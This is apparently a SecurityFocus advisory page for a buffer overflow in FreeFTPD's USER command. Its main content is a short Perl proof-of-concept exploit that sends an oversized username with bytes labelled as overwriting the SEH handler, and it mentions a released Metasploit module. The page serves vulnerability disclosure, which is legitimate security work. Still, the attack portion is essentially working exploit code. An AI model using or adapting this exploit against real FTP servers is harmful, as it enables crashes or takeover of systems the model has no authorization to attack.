Search: Home Bugtraq Vulnerabilities Mailing Lists Jobs Tools Beta Programs

FreeFTPD User Command Buffer Overflow Vulnerability

The following proof of concept is available:
#!/usr/bin/perl -w
#freeftpd USER buffer overflow
#barabas - 2005

use strict;
use Net::FTP;
my $user="\x41"x1011;
$user .="\x44\x45\x46\x47";#overwrite SEH
$user .="\x50"x400;

my $ftp = Net::FTP->new("www.example.com <http://www.example.com>", Debug => 1);
$ftp->login("$user","whatevah");

An exploit for the Metasploit Framework has been released.







 

Privacy Statement
Copyright 2009, SecurityFocus